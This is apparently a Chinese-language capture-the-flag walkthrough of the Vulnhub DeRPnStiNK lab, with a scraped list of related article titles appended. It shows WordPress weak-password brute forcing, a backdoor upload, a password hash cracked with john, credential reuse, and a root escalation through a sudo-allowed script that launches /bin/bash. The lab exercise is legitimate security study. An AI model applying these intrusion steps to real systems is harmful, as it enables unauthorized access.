信息收集


开了三个端口21,22,80
访问80端口,flag1在源码下

没什么东西就扫描目录

几个有用的
http://192.168.83.154/php/phpmyadmin/
http://192.168.83.154/weblog/
http://192.168.83.154/weblog/wp-admin/----弱口令爆破 admin admin


对文件上传没有过滤,上传一个后门


配置文件,还有一个phpmyadmin没登陆

root mysql


flag2

unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
用john爆破  wedgie57


再次登录wordpress没发现啥,前面用web打入服务器了,先用那个,有两个用户,尝试用之前的密码登录一下

stinky wedgie57

flag3

尝试用stinky wedgie57登录ftp

mv derpissues.pcap ~/ftp/files/---移动到ftp目录下

发现了sshkey


用xshell连接。然后对derpissues.pacp进行分析

mrderp:"derpderpderpderpderpderpderp"

mrderp@DeRPnStiNK:~/Desktop$ cat helpdesk.log
From: Help Desk helpdesk@derpnstink.local
Date: Thu, Aug 23, 2017 at 1:29 PM
Subject: sudoers ISSUE=242 PROJ=26
To: Derp, Mr (mrderp) [C]
When replying, type your text above this line.
Help Desk Ticket Notification
Thank you for contacting the Help Desk. Your ticket information is below. If you have any
additional information to add to this ticket, please reply to this notification.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us. Note that the Help Desk’s busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
Toll-free: 1-866-504-9552
Phone: 301-402-7469
TTY: 301-451-5939
Ticket Title: Sudoers File issues
Ticket Number: 242
Status: Break/fix
Date Created: 08/23/2017
Latest Update Date: 08/23/2017
Contact Name: Mr Derp
CC’s: Uncle Stinky
Full description and latest notes on your Ticket: Sudoers File issues
Notification
Regards,
Service Desk
Listen with focus, answer with accuracy, assist with compassion.
From: Help Desk
Date: Mon, Sep 10, 2017 at 2:53 PM
Subject: sudoers ISSUE=242 PROJ=26
To: Derp, Mr (mrderp) [C]
When replying, type your text above this line.
Closed Ticket Notification
Thank you for contacting the Help Desk. Your ticket information and its resolution is
below. If you feel that the ticket has not been resolved to your satisfaction or you need additional
assistance, please reply to this notification to provide additional information.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us or visit our Self Help Web page at https://pastebin.com/RzK9WfGw
Note that the Help Desk’s busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
Toll-free: 1-866-504-9552
Phone: 301-402-7469
TTY: 301-451-5939
Ticket Title: sudoers issues
Ticket Number: 242
Status: Closed
Date Created: 09/10/2017
Latest Update Date: 09/10/2017
CC’s:
Resolution: Closing ticket. ticket notification.
Regards,
eRA Service Desk
Listen with focus, answer with accuracy, assist with compassion.
For more information, dont forget to visit the Self Help Web page!!!

没啥用,看看有什么root权限的文件

sudo -l


没有这个文件,直接运行

echo “/bin/bash” > /home/mrderp/binaries/derpy.sh
chmod +x derpy.sh
sudo ./derpy.sh

然后就是root权限

【Vulnhub】Vulnhub2018-DeRPnStiNK相关推荐

  1. 【Vulnhub】之JIS-CTF-VulnUpload-CTF01

    一. 部署方法 在官网上下载靶机ova环境:http://www.mediafire.com/file/t5b4nkynxkm9hj2/CTF01.ova 使用VMware搭建靶机环境 攻击机使用VM ...

  2. 【Vulnhub】之Deathnote

    一. 部署方法 在官网上下载靶机ova环境:https://download.vulnhub.com/deathnote/Deathnote.ova 使用VMware搭建靶机环境 攻击机使用VMwar ...

  3. 【Vulnhub】之Nagini

    一. 部署方法 在官网上下载靶机ova环境:https://download.vulnhub.com/harrypotter/Nagini.ova 使用VMware搭建靶机环境 攻击机使用VMware ...

  4. 【Vulnhub】搭建Vulnhub靶机

    一.Vulnhub介绍 Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的. 二.下载 去vulnhub的官网 https://ww ...

  5. 【vulnhub】靶机- [DC系列]DC9(附靶机))

    主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.16 ...

  6. 【vulnhub】Raven2

  7. 【VulnHub】JIS-CTF

    实验环境: 靶机:192.168.0.149 攻击机kali:192.168.0.103 一.信息收集 1.masscan快速扫端口,发现22,80端口. root@redwand:~# massca ...

  8. 【VUlnhub】Tr0ll+Dr4g0n b4ll

    Tr0ll 开了三个端口21,22,80 先访问网站 没啥,扫一下目录 试试ftp的匿名登录 用户名anonymous 无密码 匿名文件传输能够使用户与远程主机建立连接并以匿名的身份从远程主机上拷贝文 ...

  9. 【Vulnhub】DC-4

    信息收集 只开了两个端口:22,80 访问网站,只是个登录页,中间件也没什么可用漏洞 尝试爆破,用户就是admin,Admin,administrator 密码找字典. 过程不演示了,burp的模块, ...

最新文章

  1. 不相交轮换的乘积怎么求_谁能告诉我 轮换的乘积 怎么做?具体题目是
  2. pytorch神经网络插件或可以提高所有网络的准确率(提高权重的利用率)
  3. hdu1042 java_hdu 1431 素数回文
  4. Dom4j遍历解析XML测试
  5. Yet Another Broken Keyboard
  6. PhantomJS 与python的结合
  7. [css] 怎么设置可点击的元素上强制手型?
  8. 【Mac】Mac 下安装MySQL优化工具mysqltuner执行报错 [!!] Attempted to use login credentials
  9. F. Gourmet and Banquet(贪心加二分求值)
  10. html弄多个按钮_html - 一个表单中的两个提交按钮
  11. 水下光通信实现(1)----LED驱动电路
  12. excel 单元格显示公式_如何在单元格中显示公式并在Excel 2013中完全隐藏公式
  13. 猴子选大王[加强版]
  14. 2022数学建模国赛ABC题思路
  15. Tcl/Tk入门(上)
  16. Linux 服务器上传下载文件到阿里网盘
  17. 【Opencv项目实战】背景替换:动态背景移除与替换(cvzone+MediaPipe)
  18. 利用DJi-mini2进行三维建模教程
  19. 解决 ffmpeg yasm not found, use --disable-yasm for a crippled build
  20. audio标签无法播放amr格式音频解决方案(benz-amr-recorder)

热门文章

  1. 执行server-start时emacs报错说“The directory `~/.emacs.d/server#39; is unsafe”
  2. 2000字毕业个人自我鉴定范文
  3. 怎么将华为三层交换机配置为DHCP服务器?
  4. linux跟踪内存检测原理,wooyun/Linux下基于内存分析的Rootkit检测方法.html at master · exitmsconfig/wooyun · GitHub...
  5. python 函数递归一次增加一次变量_python3 --函数(函数,全局变量和局部变量,递归函数’)...
  6. WebRTC[11]-WebRTC如何通过SDP信息设置音频码率
  7. 获取日期(阴历,阳历,星期)js
  8. 原来吴京拍的“巨齿鲨”不是传说,在马里亚纳?
  9. 计算机Java校内实训报告_计算机java实训总结的范本
  10. rowspan无效_c# – RowSpan在iTextSharp中不起作用?